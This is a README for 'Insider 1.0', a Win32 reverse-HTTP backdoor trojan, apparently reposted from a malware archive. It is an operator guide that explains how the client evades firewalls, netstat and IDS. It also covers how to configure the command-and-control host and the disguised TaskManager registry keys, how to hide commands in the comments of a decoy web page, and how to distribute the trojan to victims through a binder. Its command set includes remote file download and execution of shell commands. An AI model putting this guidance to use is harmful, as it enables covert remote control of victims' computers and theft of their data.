Insider 1.0
(Trojan-Proxy.Win32.Agent.h)

by Nick

Written in C, compressed with UPX, source included

Released in July 20033

more versions


The Insider V1.0 -- Win32 reverse backdoor
[email protected] , Jul 21 2003
==========================================


Introduction
============

This is a reference implementation of win32 reverse backdoor program
called the Insider. Unlike many other backdoor programs, Insider is not
server listening some tcp/udp port, it is a client program that communicates
with the server part through http protocol. This design has some unique
features:

- Pass through almost any corporate firewall (it can automatically
  detect proxy settings if needed)
- No listening services found with "netstat -an"
- Easy to hide from IDS - communication seems like a normal web browsing

Insider network consists of the following parts:

- Client(s) on victim machine(s)
- Server cgi script

Client programs are distributed as the usual way - send some executable to
victim, do some ActiveX tricks, whatever. The cgi part can be installed 
on any server that can execute cgi scripts - anonymous hosting service should
be fine.

All the communication is http POST commands, so the actual information is
not visible in proxy logs. Of course, the information can be sniffed out as
the messages are only base64 encoded (that might change in the future).
The client looks for a specific string hidden inside the returned web page
and executes any command it founds there. This message is defined with the 
compile time define PREFIX (you need this information later).

This release is the reference implementation, it works but it requires some
work in the server side to get things going. It includes no fancy features,
such as keyloggers, sniffers, etc - just a plain command line interface.



Operation
=========

Clients are identified with a unique 32-chracter id which is sent to server 
every time the client has something to say.

After the initial execution, client finds out some settings from registry
and sends the following information to server:

User: Login (Real name)
Logon domain: Domainname
Location: Company (Country)
System: Operating system (Service pack)
Connection: Connection type

Cgi script "cc.cgi" included with the distribution stores each client
it finds out in directory named as the id. The initial information
is stored in file "info" in that directory.

At this point, the server can send commands to client. Following commands
are defined in reference implementation:

 i		Send initial information
 x		Shutdown
 t min-max	Set the polling time random between min and max seconds
 f url file	Fetch file from url and store it as file
 s command	Run command with command interpreter (cmd.exe/command.com)

cc.cgi reads the command from file "cmd" and writes the result in file "result".


Example:

1. Client is installed on victim machine.
2. Clients unique id is "c1b5e2adc491459a05f8d1b164ab66f"
3. Client sends the initial information to server
4. Server makes a directory "c1b5e2adc491459a05f8d1b164ab66f" and stores
   the initial information as "c1b5e2adc491459a05f8d1b164ab66f/info" 
5. Server reads command "s ipconfig /all" from file
   "c1b5e2adc491459a05f8d1b164ab66f/cmd" and send the command to client
6. Client executes the command and sends the results
7. Server stores the result as "c1b5e2adc491459a05f8d1b164ab66f/result"
   and looks for a new command...



Installation
============

1. Edit file insider.h (or use precompiled binary in.exe, see section 2.)

- Change HOST, PORT and URL to that of your cgi:

/* Default host and port */
#define HOST    "someserver.com"
#define PORT    80

/* Base URL */
#define URL     "/cgi-bin/cc.cgi";

- Also, it might be a good idea to change the default prefix:

/* Comment prefix */
#define PREFIX  "StartJavaScript="



2. Run compile.bat (you need MS Visual C to do this).

- You should now have a binary insider.exe, size about 50K. Pack the file
if feel like it (upx can squeeze it in 25K).

NOTE: You can also use the precompiled binary file in.exe and configure
the client using the following registry keys:

HKCU\Software\Microsoft\TaskManager\Host
HKCU\Software\Microsoft\TaskManager\Port
HKCU\Software\Microsoft\TaskManager\URL
HKCU\Software\Microsoft\TaskManager\Prefix

In that case, you must write the above registry keys somehow in the
installation process. You can always rename in.exe if you wish.



3. Prepare your cgi

- Edit the variable PREFIX to fit your clients

- Take some web page and cut that in two parts, called header.txt and
footer.txt. The command is inserted as a base64-encoded message in comment field
between the two parts:

(header.txt)
<!-- PREFIX -->
(footer.txt)

Of course, it could be as simple as a bare "<!-- PREFIX -->", but you might
want to make look like someone is browing your web site with a real
content.


4. Distribute

- example binder/installer is included in directory "binder".


5. Wait for your clients to appear


6. Use your imagination.........




Still in progress
=================

- Proxy authentication
- The cgi is very stupid, make something more useful
- Message encryption
- Some control cgi script so that the whole thing can
  be controlled through web interface.



nick


size: 24,064 bytes

tested on Windows XP
September 29, 2005

MegaSecurity